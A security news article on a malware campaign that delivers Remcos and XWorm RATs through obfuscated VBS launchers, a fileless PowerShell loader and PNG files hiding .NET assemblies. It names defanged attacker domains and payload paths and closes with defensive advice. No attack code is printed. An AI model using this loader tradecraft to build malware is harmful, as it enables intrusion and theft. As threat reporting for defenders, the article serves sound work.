Open Directory Malware Campaign Delivers RAT Payloads via VBS and PNG Loaders
Key Takeaways A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure. The attack chain utilizes obfuscated...
Key Takeaways
- A sophisticated, multi-stage malware campaign is actively deploying Remote Access Trojans (RATs) through a flexible, open-directory infrastructure.
- The attack chain utilizes obfuscated Visual Basic Script (VBS) files to launch fileless PowerShell loaders, which then retrieve malicious payloads hidden within seemingly benign PNG image files.
- Affected systems can be compromised with XWorm variants and Remcos RAT, along with a User Account Control (UAC) bypass, granting attackers persistent remote access and elevated privileges.
- The campaign leverages an adaptable command-and-control (C2) setup, allowing threat actors to rapidly change or expand their malicious arsenal.
A complex, multi-stage malware operation has emerged, leveraging obfuscated Visual Basic Script (VBS) files, image-based loaders, and remote access trojans (RATs) to infiltrate target systems. Details of this campaign were uncovered by cybersecurity researchers at LevelBlue’s SpiderLabs Cyber Threat Intelligence team.
Table Of Content
Initially, an endpoint detection in early 2026 flagged a suspicious VBS file. What appeared to be an isolated incident quickly revealed a more organized threat: a reusable delivery framework capable of distributing diverse malware payloads across multiple attack vectors from a unified infrastructure.
Initial Detection and Unveiling the Campaign
The campaign first came to light with the discovery of a VBS file, named Name_File.vbs, located in the UsersPublicDownloads directory of a compromised endpoint. SentinelOne’s endpoint protection successfully quarantined the file before it could fully execute, but its encoded contents prompted further investigation.
Decryption of the VBS script exposed a Base64-encoded PowerShell command containing external network references, indicating an intent to fetch additional malicious components from a remote server. This initial alert provided LevelBlue analysts with a crucial entry point into a much broader cyber operation.
The subsequent investigation by LevelBlue’s SpiderLabs team revealed an attacker-controlled domain hosting numerous obfuscated VBS files. Each file was designed to deliver a different malware payload, including various XWorm variants and Remcos RAT, often disguised as plain text files. The researchers also identified a separate infection chain on the same infrastructure, initiated by a fake PDF file, confirming the campaign’s deliberate multi-vector design. A detailed report on the campaign can be found in the LevelBlue blog.
Attacker Infrastructure: The Open Directory Advantage
The core of the attacker’s infrastructure revolved around openly accessible directories hosted on the domain news4me[.]xyz. Specific subdirectories like /coupon/, /protector/, and /invoice/ each played a distinct role in the attack. These directories were used for staging VBS launchers, hosting obfuscated payload files, and delivering alternative infection vectors.
This “open directory” strategy was a deliberate design choice, providing the attackers with significant operational flexibility. It allowed them to rapidly update, rotate, or expand their hosted payloads without altering the underlying delivery logic. This adaptive system ensures continued operation even if specific components are detected and mitigated.
Inside the Infection Mechanism: VBS to In-Memory RAT Execution
The infection process initiates with a VBS file that functions solely as a launcher, devoid of any active malicious code itself.

This script is heavily obscured using Unicode obfuscation. Removing these layers reveals a Base64-encoded PowerShell command, which serves as the true operational core of the attack.

The decoded PowerShell command acts as a fileless loader. It enforces TLS 1.2 and employs the Net.WebClient class to retrieve a remote file from an Internet Archive URL.

Instead of downloading a standard executable, the loader fetches a PNG image file named MSI_PRO_with_b64.png. This image appears innocuous, but it secretly harbors a Base64-encoded .NET assembly, known as PhantomVAI, embedded between custom BaseStart and BaseEnd markers. This assembly is loaded directly into memory via Reflection.Assembly::Load, allowing it to execute entirely in RAM and effectively bypass many file-based security defenses.
Once PhantomVAI is active, it receives two URLs through its VAI method for subsequent execution. The first URL, news4me[.]xyz/protector/johnremcos.txt, contains an obfuscated string that decodes into a fully functional instance of the Remcos RAT, providing the attacker with persistent remote access. The second URL delivers uac.png, another PNG file containing a User Account Control (UAC) Bypass DLL, embedded in the same format, designed to silently escalate privileges on the compromised system. This combination of payloads grants the attackers comprehensive control while leaving minimal traditional file artifacts.
What You Should Do
- Restrict Script Execution: Implement policies to restrict the execution of
.vbsand.batfiles from user-writable directories, such asUsersPublic. - Enforce PowerShell Policies: Apply constrained PowerShell policies and enable comprehensive logging for in-memory execution to detect fileless attacks.
- Network Filtering: Block WebDAV-based connections and consider filtering traffic to and from
.xyztop-level domains to disrupt communication with known attacker infrastructure. - Advanced Endpoint Protection: Ensure your endpoint detection and response (EDR) solutions are configured to monitor for suspicious in-memory activity and fileless execution techniques, not just file-based threats.
- Threat Intelligence Integration: Integrate external threat intelligence feeds to stay updated on new attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.